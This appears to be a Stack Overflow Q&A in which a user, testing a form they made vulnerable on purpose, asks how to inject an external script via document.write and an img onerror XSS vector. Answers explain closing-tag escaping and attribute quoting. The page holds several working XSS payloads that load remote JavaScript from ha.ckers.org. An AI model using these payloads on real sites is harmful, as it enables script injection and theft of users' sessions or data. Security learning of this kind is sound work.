# load external javascript in the syntax

Tags: javascript, xss

How do i load an external `.js` script using this syntax?:

`<script>document.write('<script src=http://ha.ckers.org/xss.js></script>')</script>`.

For all those wondering, i setup a test form i made purposely vulnerable but i couldn't get this to launch and yes i know :

`<script src=//ha.ckers.org/xss.js></script>`

Could easily work but i'm just trying to figure out how i could do it using document.write.

Thanks to anyone who is able to help me.
//Edit
Why doesn't this work?
`<img src=x onerror=document.write('<script src="http://ha.ckers.org/xss.js"><\/script>')>`

Comment: You have to escape the `</script>` tag: `<\/script>` - otherwise the compiler will end the JS with that tag and not with the right one

Answer (score 1, accepted):

What you have to remember is that what lies within the `<script>....</script>` tags is **opaque** to the browser. Its job is, having seen `<script>`, to gather up everything largely without parsing it until it sees `</script>` and then had that intervening text off to the JavaScript engine.

In your case, what it sees between `<script>` and `</script>` is:

```
document.write('<script src=http://ha.ckers.org/xss.js>
```

...which obviously results in a syntax error. That's because the **first** `</script>` terminates the **first** `<script>`:

```
<script>document.write('<script src=http://ha.ckers.org/xss.js></script>')</script>
<!-- Browser thinks things end here ---------------------------^ -->
```

You have to break it up so it's not the literal sequence `</script>`. There are lots of ways to do that. Add a `\`:

```
<script>document.write('<script src=http://ha.ckers.org/xss.js><\/script>')</script>
```

or break the string:

```
<script>document.write('<script src=http://ha.ckers.org/xss.js></scr' + 'ipt>')</script>
```

Comment: hmm strange it only works with <script> tags, i was wondering, when the xss is <img src=x onerror=document.write('<script src="http://ha.ckers.org/xss.js"><\/script>')> it doesn't work, why?

Comment: @user2536979: I'm not quite sure what you mean by "doesn't work," but remember that the text of HTML attributes is **HTML**. And if you don't enclose the value of an attribute in quotes, the attribute value ends at the first space (in your case, after `<script`).

Comment: You have to wrap the inline code, added with HTML tags events, inside the quotes. You will need to escape the string in the right way, or it won't work! (But I'm not sure it would work anyway)

Comment: @T.J.Crowder The xss works when i have it surrounded by <script> tags, however, when i use the vector <img src=x onerror=javascriptcodegoeshere> it doesn't work. "<img src=x onerror=document.write('<script src=http://ha.ckers.org/xss.js></script>')>" doesn't work but "<script>document.write('<script src=http://ha.ckers.org/xss.js><\/script>')</script>" works.

Comment: @user2536979: See above. If you ensure the attribute is properly encoded, the script will run. You probably *don't* want `document.write`, though, as it completely replaces the page at the point `onerror` would load it. But fundamentally: Why all these games?

Comment: @T.J.Crowder I'm trying to understand how this works and why with the example provided it worked, where as with the xss vector i provided, it didn't. Thanks for your help so far, really appreciate it. Just for educational purposes to be honest.

Comment: Have you tried `<img src=x onerror="document.write('<script src=ha.ckers.org/xss.js><\/script>')>">;`?

Comment: Yes, it doesn't work :(. In clearer text number 2 works and 1 doesn't, i really do not understand why it doesn't.http://pastebin.com/6w3xXGV9